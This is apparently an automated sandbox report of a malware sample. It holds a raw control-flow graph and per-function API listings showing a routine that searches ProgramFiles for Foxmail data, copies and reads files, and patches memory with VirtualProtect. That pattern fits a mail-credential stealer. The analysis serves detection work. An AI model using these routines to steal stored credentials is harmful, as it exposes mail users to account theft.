374d54a7 38 API calls 7418->7419 7420 374d8a51 7419->7420 7427 374d8821 7420->7427 7424 374d880d 7423->7424 7426 374d881e 7423->7426 7425 374d571e 20 API calls 7424->7425 7424->7426 7425->7426 7426->7415 7428 374d883c 7427->7428 7429 374d8862 MultiByteToWideChar 7428->7429 7430 374d888c 7429->7430 7439 374d8a16 7429->7439 7432 374d88ad 7430->7432 7434 374d56d0 21 API calls 7430->7434 7431 374d2ada 5 API calls 7433 374d6b87 7431->7433 7435 374d88f6 MultiByteToWideChar 7432->7435 7450 374d8962 7432->7450 7433->7403 7434->7432 7436 374d890f 7435->7436 7435->7450 7454 374d5f19 7436->7454 7438 374d8801 20 API calls 7438->7439 7439->7431 7441 374d8939 7443 374d5f19 11 API calls 7441->7443 7441->7450 7442 374d8971 7445 374d56d0 21 API calls 7442->7445 7448 374d8992 7442->7448 7443->7450 7444 374d8a07 7447 374d8801 20 API calls 7444->7447 7445->7448 7446 374d5f19 11 API calls 7449 374d89e6 7446->7449 7447->7450 7448->7444 7448->7446 7449->7444 7451 374d89f5 WideCharToMultiByte 7449->7451 7450->7438 7451->7444 7452 374d8a35 7451->7452 7453 374d8801 20 API calls 7452->7453 7453->7450 7455 374d5c45 5 API calls 7454->7455 7456 374d5f40 7455->7456 7459 374d5f49 7456->7459 7462 374d5fa1 7456->7462 7460 374d2ada 5 API calls 7459->7460 7461 374d5f9b 7460->7461 7461->7441 7461->7442 7461->7450 7463 374d5c45 5 API calls 7462->7463 7464 374d5fc8 7463->7464 7465 374d2ada 5 API calls 7464->7465 7466 374d5f89 LCMapStringW 7465->7466 7466->7459 7468 374d6892 7467->7468 7475 374d5671 RtlEnterCriticalSection 7468->7475 7470 374d689c 7476 374d68f1 7470->7476 7474 374d68b5 7474->7393 7475->7470 7488 374d7011 7476->7488 7478 374d693f 7479 374d7011 26 API calls 7478->7479 7480 374d695b 7479->7480 7481 374d7011 26 API calls 7480->7481 7482 374d6979 7481->7482 7483 374d68a9 7482->7483 7484 374d571e 20 API calls 7482->7484 7485 374d68bd 7483->7485 7484->7483 7502 374d56b9 RtlLeaveCriticalSection 7485->7502 7487 374d68c7 7487->7474 7489 374d7022 7488->7489 7493 374d701e 7488->7493 7490 374d7029 
7489->7490 7495 374d703c 7489->7495 7491 374d6368 20 API calls 7490->7491 7492 374d702e 7491->7492 7494 374d62ac 26 API calls 7492->7494 7493->7478 7494->7493 7495->7493 7496 374d706a 7495->7496 7497 374d7073 7495->7497 7498 374d6368 20 API calls 7496->7498 7497->7493 7499 374d6368 20 API calls 7497->7499 7500 374d706f 7498->7500 7499->7500 7501 374d62ac 26 API calls 7500->7501 7501->7493 7502->7487 7506 374d7092 7503->7506 7507 374d54a7 38 API calls 7506->7507 7508 374d70a6 7507->7508 7508->7337 7142 374d281c 7143 374d2882 27 API calls 7142->7143 7144 374d282a 7143->7144 6312 374d1c5b 6313 374d1c6b 6312->6313 6316 374d12ee 6313->6316 6315 374d1c87 6317 374d1324 6316->6317 6318 374d13b7 GetEnvironmentVariableW 6317->6318 6342 374d10f1 6318->6342 6321 374d10f1 57 API calls 6322 374d1465 6321->6322 6323 374d10f1 57 API calls 6322->6323 6324 374d1479 6323->6324 6325 374d10f1 57 API calls 6324->6325 6326 374d148d 6325->6326 6327 374d10f1 57 API calls 6326->6327 6328 374d14a1 6327->6328 6329 374d10f1 57 API calls 6328->6329 6330 374d14b5 lstrlenW 6329->6330 6331 374d14d9 lstrlenW 6330->6331 6332 374d14d2 6330->6332 6333 374d10f1 57 API calls 6331->6333 6332->6315 6334 374d1501 lstrlenW lstrcatW 6333->6334 6335 374d10f1 57 API calls 6334->6335 6336 374d1539 lstrlenW lstrcatW 6335->6336 6337 374d10f1 57 API calls 6336->6337 6338 374d156b lstrlenW lstrcatW 6337->6338 6339 374d10f1 57 API calls 6338->6339 6340 374d159d lstrlenW lstrcatW 6339->6340 6341 374d10f1 57 API calls 6340->6341 6341->6332 6343 374d1118 6342->6343 6344 374d1129 lstrlenW 6343->6344 6355 374d2c40 6344->6355 6347 374d1168 lstrlenW 6348 374d1177 lstrlenW FindFirstFileW 6347->6348 6349 374d11e1 6348->6349 6350 374d11a0 6348->6350 6349->6321 6351 374d11aa 6350->6351 6352 374d11c7 FindNextFileW 6350->6352 6351->6352 6357 374d1000 6351->6357 6352->6350 6354 374d11da FindClose 6352->6354 6354->6349 6356 374d1148 lstrcatW lstrlenW 6355->6356 6356->6347 6356->6348 6358 374d1022 6357->6358 6359 374d10af 
6358->6359 6360 374d102f lstrcatW lstrlenW 6358->6360 6361 374d10ad 6359->6361 6362 374d10b5 lstrlenW 6359->6362 6363 374d106b lstrlenW 6360->6363 6364 374d105a lstrlenW 6360->6364 6361->6351 6388 374d1e16 6362->6388 6374 374d1e89 lstrlenW 6363->6374 6364->6363 6367 374d10ca 6367->6361 6370 374d1e89 5 API calls 6367->6370 6368 374d1088 GetFileAttributesW 6368->6361 6369 374d109c 6368->6369 6369->6361 6380 374d173a 6369->6380 6371 374d10df 6370->6371 6393 374d11ea 6371->6393 6375 374d2c40 6374->6375 6376 374d1ea7 lstrcatW lstrlenW 6375->6376 6377 374d1ed1 lstrcatW 6376->6377 6378 374d1ec2 6376->6378 6377->6368 6378->6377 6379 374d1ec7 lstrlenW 6378->6379 6379->6377 6381 374d1747 6380->6381 6408 374d1cca 6381->6408 6385 374d199f 6385->6361 6386 374d1824 6386->6385 6428 374d15da 6386->6428 6389 374d1e29 6388->6389 6392 374d1e4c 6388->6392 6390 374d1e2d lstrlenW 6389->6390 6389->6392 6391 374d1e3f lstrlenW 6390->6391 6390->6392 6391->6392 6392->6367 6394 374d120e 6393->6394 6395 374d1e89 5 API calls 6394->6395 6396 374d1220 GetFileAttributesW 6395->6396 6397 374d1246 6396->6397 6398 374d1235 6396->6398 6399 374d1e89 5 API calls 6397->6399 6398->6397 6400 374d173a 35 API calls 6398->6400 6401 374d1258 6399->6401 6400->6397 6402 374d10f1 56 API calls 6401->6402 6403 374d126d 6402->6403 6404 374d1e89 5 API calls 6403->6404 6405 374d127f 6404->6405 6406 374d10f1 56 API calls 6405->6406 6407 374d12e6 6406->6407 6407->6361 6409 374d1cf1 6408->6409 6410 374d1d0f CopyFileW CreateFileW 6409->6410 6411 374d1d55 GetFileSize 6410->6411 6412 374d1d44 DeleteFileW 6410->6412 6413 374d1ede 22 API calls 6411->6413 6417 374d1808 6412->6417 6414 374d1d66 ReadFile 6413->6414 6415 374d1d7d CloseHandle DeleteFileW 6414->6415 6416 374d1d94 CloseHandle DeleteFileW 6414->6416 6415->6417 6416->6417 6417->6385 6418 374d1ede 6417->6418 6420 374d222f 6418->6420 6421 374d224e 6420->6421 6424 374d2250 6420->6424 6436 374d474f 6420->6436 6441 374d47e5 6420->6441 6421->6386 6423 374d2908 6425 374d35d2 
RaiseException 6423->6425 6424->6423 6448 374d35d2 6424->6448 6427 374d2925 6425->6427 6427->6386 6429 374d160c 6428->6429 6430 374d163c lstrlenW 6429->6430 6462 374d1c9d 6430->6462 6432 374d1655 lstrcatW lstrlenW 6433 374d1678 6432->6433 6434 374d167e lstrcatW 6433->6434 6435 374d1693 6433->6435 6434->6435 6435->6386 6451 374d4793 6436->6451 6438 374d2ada 5 API calls 6439 374d478f 6438->6439 6439->6420 6440 374d4765 6440->6438 6446 374d56d0 6441->6446 6442 374d570e 6444 374d6368 20 API calls 6442->6444 6443 374d56f9 RtlAllocateHeap 6445 374d570c 6443->6445 6443->6446 6444->6445 6445->6420 6446->6442 6446->6443 6447 374d474f 7 API calls 6446->6447 6447->6446 6449 374d35f2 RaiseException 6448->6449 6449->6423 6452 374d479f 6451->6452 6457 374d5671 RtlEnterCriticalSection 6452->6457 6454 374d47aa 6458 374d47dc 6454->6458 6456 374d47d1 6456->6440 6457->6454 6461 374d56b9 RtlLeaveCriticalSection 6458->6461 6460 374d47e3 6460->6456 6461->6460 6463 374d1ca6 6462->6463 6463->6432 7693 374d4a9a 7696 374d5411 7693->7696 7697 374d541d 7696->7697 7698 374d5af6 38 API calls 7697->7698 7701 374d5422 7698->7701 7699 374d55a8 38 API calls 7700 374d544c 7699->7700 7701->7699 7509 374d73d5 7510 374d73e1 7509->7510 7521 374d5671 RtlEnterCriticalSection 7510->7521 7512 374d73e8 7522 374d8be3 7512->7522 7514 374d73f7 7520 374d7406 7514->7520 7535 374d7269 GetStartupInfoW 7514->7535 7518 374d7417 7546 374d7422 7520->7546 7521->7512 7523 374d8bef 7522->7523 7524 374d8bfc 7523->7524 7525 374d8c13 7523->7525 7527 374d6368 20 API calls 7524->7527 7549 374d5671 RtlEnterCriticalSection 7525->7549 7528 374d8c01 7527->7528 7529 374d62ac 26 API calls 7528->7529 7530 374d8c0b 7529->7530 7530->7514 7531 374d8c4b 7557 374d8c72 7531->7557 7532 374d8c1f 7532->7531 7550 374d8b34 7532->7550 7536 374d7318 7535->7536 7537 374d7286 7535->7537 7541 374d731f 7536->7541 7537->7536 7538 374d8be3 27 API calls 7537->7538 7540 374d72af 7538->7540 7539 374d72dd GetFileType 7539->7540 7540->7536 7540->7539 7542 
374d7326 7541->7542 7543 374d7369 GetStdHandle 7542->7543 7544 374d73d1 7542->7544 7545 374d737c GetFileType 7542->7545 7543->7542 7544->7520 7545->7542 7561 374d56b9 RtlLeaveCriticalSection 7546->7561 7548 374d7429 7548->7518 7549->7532 7551 374d637b 20 API calls 7550->7551 7556 374d8b46 7551->7556 7552 374d8b53 7553 374d571e 20 API calls 7552->7553 7555 374d8ba5 7553->7555 7554 374d5eb7 11 API calls 7554->7556 7555->7532 7556->7552 7556->7554 7560 374d56b9 RtlLeaveCriticalSection 7557->7560 7559 374d8c79 7559->7530 7560->7559 7561->7548 7562 374d4ed7 7563 374d6d60 51 API calls 7562->7563 7564 374d4ee9 7563->7564 7573 374d7153 GetEnvironmentStringsW 7564->7573 7567 374d4ef4 7569 374d571e 20 API calls 7567->7569 7570 374d4f29 7569->7570 7571 374d4eff 7572 374d571e 20 API calls 7571->7572 7572->7567 7574 374d71bd 7573->7574 7575 374d716a 7573->7575 7576 374d4eee 7574->7576 7577 374d71c6 FreeEnvironmentStringsW 7574->7577 7578 374d7170 WideCharToMultiByte 7575->7578 7576->7567 7585 374d4f2f 7576->7585 7577->7576 7578->7574 7579 374d718c 7578->7579 7580 374d56d0 21 API calls 7579->7580 7581 374d7192 7580->7581 7582 374d7199 WideCharToMultiByte 7581->7582 7583 374d71af 7581->7583 7582->7583 7584 374d571e 20 API calls 7583->7584 7584->7574 7586 374d4f44 7585->7586 7587 374d637b 20 API calls 7586->7587 7591 374d4f6b 7587->7591 7588 374d571e 20 API calls 7590 374d4fe9 7588->7590 7589 374d4fcf 7589->7588 7590->7571 7591->7589 7592 374d637b 20 API calls 7591->7592 7593 374d4fd1 7591->7593 7594 374d544d 26 API calls 7591->7594 7597 374d4ff3 7591->7597 7600 374d571e 20 API calls 7591->7600 7592->7591 7595 374d5000 20 API calls 7593->7595 7594->7591 7596 374d4fd7 7595->7596 7598 374d571e 20 API calls 7596->7598 7599 374d62bc 11 API calls 7597->7599 7598->7589 7601 374d4fff 7599->7601 7600->7591 7046 374d5351 7047 374d5374 7046->7047 7048 374d5360 7046->7048 7049 374d571e 20 API calls 7047->7049 7048->7047 7050 374d571e 20 API calls 7048->7050 7051 374d5386 7049->7051 
7050->7047 7052 374d571e 20 API calls 7051->7052 7053 374d5399 7052->7053 7054 374d571e 20 API calls 7053->7054 7055 374d53aa 7054->7055 7056 374d571e 20 API calls 7055->7056 7057 374d53bb 7056->7057 7602 374d36d0 7603 374d36e2 7602->7603 7605 374d36f0 7602->7605 7604 374d2ada 5 API calls 7603->7604 7604->7605 7702 374d3c90 RtlUnwind 7703 374d60ac 7704 374d60b7 7703->7704 7706 374d60dd 7703->7706 7705 374d60c7 FreeLibrary 7704->7705 7704->7706 7705->7704 7058 374d506f 7059 374d5081 7058->7059 7061 374d5087 7058->7061 7062 374d5000 7059->7062 7063 374d500d 7062->7063 7064 374d502a 7062->7064 7065 374d5024 7063->7065 7067 374d571e 20 API calls 7063->7067 7064->7061 7066 374d571e 20 API calls 7065->7066 7066->7064 7067->7063 7068 374dac6b 7069 374dac84 7068->7069 7071 374dacad 7069->7071 7072 374db2f0 7069->7072 7073 374db329 7072->7073 7074 374db5c1 RaiseException 7073->7074 7075 374db350 7073->7075 7074->7075 7076 374db393 7075->7076 7077 374db36e 7075->7077 7078 374db8b2 20 API calls 7076->7078 7083 374db8e1 7077->7083 7080 374db38e 7078->7080 7081 374d2ada 5 API calls 7080->7081 7082 374db3b7 7081->7082 7082->7071 7084 374db8f0 7083->7084 7085 374db90f 7084->7085 7086 374db964 7084->7086 7087 374d78a3 5 API calls 7085->7087 7088 374db8b2 20 API calls 7086->7088 7089 374db950 7087->7089 7090 374db95d 7088->7090 7089->7090 7091 374db8b2 20 API calls 7089->7091 7090->7080 7091->7090 7145 374d742b 7146 374d7430 7145->7146 7148 374d7453 7146->7148 7149 374d8bae 7146->7149 7150 374d8bbb 7149->7150 7151 374d8bdd 7149->7151 7152 374d8bc9 RtlDeleteCriticalSection 7150->7152 7153 374d8bd7 7150->7153 7151->7146 7152->7152 7152->7153 7154 374d571e 20 API calls 7153->7154 7154->7151 6464 374dc7a7 6465 374dc7be 6464->6465 6469 374dc82c 6464->6469 6465->6469 6476 374dc7e6 GetModuleHandleA 6465->6476 6467 374dc835 GetModuleHandleA 6470 374dc83f 6467->6470 6468 374dc872 6469->6467 6469->6468 6469->6470 6470->6469 6471 374dc85f GetProcAddress 6470->6471 6471->6469 6472 374dc7dd 
6472->6469 6472->6470 6473 374dc800 GetProcAddress 6472->6473 6473->6469 6474 374dc80d VirtualProtect 6473->6474 6474->6469 6475 374dc81c VirtualProtect 6474->6475 6475->6469 6477 374dc7ef 6476->6477 6482 374dc82c 6476->6482 6488 374dc803 GetProcAddress 6477->6488 6479 374dc7f4 6479->6482 6483 374dc800 GetProcAddress 6479->6483 6480 374dc835 GetModuleHandleA 6486 374dc83f 6480->6486 6481 374dc872 6482->6480 6482->6481 6482->6486 6483->6482 6484 374dc80d VirtualProtect 6483->6484 6484->6482 6485 374dc81c VirtualProtect 6484->6485 6485->6482 6486->6482 6487 374dc85f GetProcAddress 6486->6487 6487->6482 6489 374dc82c 6488->6489 6490 374dc80d VirtualProtect 6488->6490 6492 374dc835 GetModuleHandleA 6489->6492 6493 374dc872 6489->6493 6490->6489 6491 374dc81c VirtualProtect 6490->6491 6491->6489 6495 374dc83f 6492->6495 6494 374dc85f GetProcAddress 6494->6495 6495->6489 6495->6494 7707 374d21a1 7710 374d2418 7707->7710 7712 374d2420 7710->7712 7714 374d47f5 7712->7714 7713 374d21bc 7715 374d4808 7714->7715 7716 374d4804 7714->7716 7719 374d4815 7715->7719 7716->7713 7720 374d5b7a 20 API calls 7719->7720 7723 374d482c 7720->7723 7721 374d2ada 5 API calls 7722 374d4811 7721->7722 7722->7713 7723->7721 7606 374da1e0 7609 374da1fe 7606->7609 7608 374da1f6 7610 374da203 7609->7610 7611 374daa53 21 API calls 7610->7611 7613 374da298 7610->7613 7612 374da42f 7611->7612 7612->7608 7613->7608 7724 374d81a0 7725 374d81d9 7724->7725 7726 374d81dd 7725->7726 7737 374d8205 7725->7737 7727 374d6368 20 API calls 7726->7727 7728 374d81e2 7727->7728 7730 374d62ac 26 API calls 7728->7730 7729 374d8529 7731 374d2ada 5 API calls 7729->7731 7732 374d81ed 7730->7732 7733 374d8536 7731->7733 7734 374d2ada 5 API calls 7732->7734 7735 374d81f9 7734->7735 7737->7729 7738 374d80c0 7737->7738 7739 374d80db 7738->7739 7740 374d2ada 5 API calls 7739->7740 7741 374d8152 7740->7741 7741->7737 7155 374d543d 7156 374d5440 7155->7156 7157 374d55a8 38 API calls 7156->7157 7158 374d544c 7157->7158 7614 
374d5bff 7622 374d5d5c 7614->7622 7617 374d5c13 7618 374d5b7a 20 API calls 7619 374d5c1b 7618->7619 7620 374d5c28 7619->7620 7621 374d5c2b 11 API calls 7619->7621 7621->7617 7623 374d5c45 5 API calls 7622->7623 7624 374d5d83 7623->7624 7625 374d5d9b TlsAlloc 7624->7625 7626 374d5d8c 7624->7626 7625->7626 7627 374d2ada 5 API calls 7626->7627 7628 374d5c09 7627->7628 7628->7617 7628->7618 7742 374d67bf 7747 374d67f4 7742->7747 7745 374d67db 7746 374d571e 20 API calls 7746->7745 7748 374d6806 7747->7748 7757 374d67cd 7747->7757 7749 374d680b 7748->7749 7750 374d6836 7748->7750 7751 374d637b 20 API calls 7749->7751 7750->7757 7758 374d71d6 7750->7758 7752 374d6814 7751->7752 7754 374d571e 20 API calls 7752->7754 7754->7757 7755 374d6851 7756 374d571e 20 API calls 7755->7756 7756->7757 7757->7745 7757->7746 7759 374d71e1 7758->7759 7760 374d71fa 7759->7760 7761 374d7209 7759->7761 7762 374d6368 20 API calls 7760->7762 7764 374d7218 7761->7764 7767 374d8a98 7761->7767 7766 374d71ff 7762->7766 7774 374d8acb 7764->7774 7766->7755 7768 374d8ab8 RtlSizeHeap 7767->7768 7769 374d8aa3 7767->7769 7768->7764 7770 374d6368 20 API calls 7769->7770 7771 374d8aa8 7770->7771 7772 374d62ac 26 API calls 7771->7772 7773 374d8ab3 7772->7773 7773->7764 7775 374d8ad8 7774->7775 7776 374d8ae3 7774->7776 7777 374d56d0 21 API calls 7775->7777 7778 374d8aeb 7776->7778 7785 374d8af4 7776->7785 7783 374d8ae0 7777->7783 7779 374d571e 20 API calls 7778->7779 7779->7783 7780 374d8b1e RtlReAllocateHeap 7780->7783 7780->7785 7781 374d8af9 7782 374d6368 20 API calls 7781->7782 7782->7783 7783->7766 7784 374d474f 7 API calls 7784->7785 7785->7780 7785->7781 7785->7784 7786 374d9db8 7788 374d9dbf 7786->7788 7787 374d9e20 7789 374daa17 21 API calls 7787->7789 7790 374da90e 7787->7790 7788->7787 7792 374d9ddf 7788->7792 7791 374d9e6e 7789->7791 7792->7790 7793 374daa17 21 API calls 7792->7793 7794 374da93e 7793->7794 7092 374d9e71 7093 374d9e95 7092->7093 7094 374d9eae 7093->7094 7096 374dac6b 7093->7096 

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 374D1137
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 374D1151
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D115C
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D116D
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D117C
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 374D1193
                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 374D11D0
                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 374D11DB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                                          • Opcode ID: d53567b944a84353f55e5c054f87f967ad1b9e4121e8b2cf24a2de754f886143
                                                                                                                                                                                          • Instruction ID: af7d9ddc7e1fc5304592c9ca7cfa3a7e90696631f8fa67e2539d219ef678d1f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d53567b944a84353f55e5c054f87f967ad1b9e4121e8b2cf24a2de754f886143
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2921D571A44308ABD711EA64DC49FDB7B9CEF84718F00092AF998E3191EB34F6058B96
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 374D1434
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 374D1137
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrcatW.KERNEL32(?,?), ref: 374D1151
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D115C
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D116D
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D117C
                                                                                                                                                                                            • Part of subcall function 374D10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 374D1193
                                                                                                                                                                                            • Part of subcall function 374D10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 374D11D0
                                                                                                                                                                                            • Part of subcall function 374D10F1: FindClose.KERNELBASE(00000000), ref: 374D11DB
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 374D14C5
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 374D14E0
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 374D150F
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 374D1521
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 374D1547
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 374D1553
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 374D1579
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 374D1585
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 374D15AB
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 374D15B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                          • Opcode ID: b5d92c1bba2e22219e38d86d297e061b72f2aea04d623dd5895b2c29e3f159b0
                                                                                                                                                                                          • Instruction ID: 510ad0e2032a715d049e820b556ccce0a4ca45ef6e8a2380e4b3eb977d9db893
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5d92c1bba2e22219e38d86d297e061b72f2aea04d623dd5895b2c29e3f159b0
                                                                                                                                                                                          • Instruction Fuzzy Hash: A381F271A40318A9DB20DBA0DC55FEFB33CEF84710F10059AF908E7181EA756A84CF96
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(374DC7DD), ref: 374DC7E6
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,374DC7DD), ref: 374DC838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 374DC860
                                                                                                                                                                                            • Part of subcall function 374DC803: GetProcAddress.KERNEL32(00000000,374DC7F4), ref: 374DC804
                                                                                                                                                                                            • Part of subcall function 374DC803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC816
                                                                                                                                                                                            • Part of subcall function 374DC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC82A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction ID: 01e6992fb45852f35d3389495a5d398253ea8f82a4305b6796d0272c1c2968f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F0122609853C03CBA1142B44C24EFA9FD89B676B3B10DB5AF0C0C6293CDA4B102C3F6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,374DC7DD), ref: 374DC838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 374DC860
                                                                                                                                                                                            • Part of subcall function 374DC7E6: GetModuleHandleA.KERNEL32(374DC7DD), ref: 374DC7E6
                                                                                                                                                                                            • Part of subcall function 374DC7E6: GetProcAddress.KERNEL32(00000000,374DC7F4), ref: 374DC804
                                                                                                                                                                                            • Part of subcall function 374DC7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC816
                                                                                                                                                                                            • Part of subcall function 374DC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC82A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction ID: d24a52868dcc33ba231226b7984882b42d03953c591a090689c51ffb2583d8c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F821F9754492C16FF71147B44C24FE56FD89B572B2F19CA9AF0C0CB243D5A8B446C3A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,374DC7F4), ref: 374DC804
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC816
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC82A
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,374DC7DD), ref: 374DC838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 374DC860
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
• Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
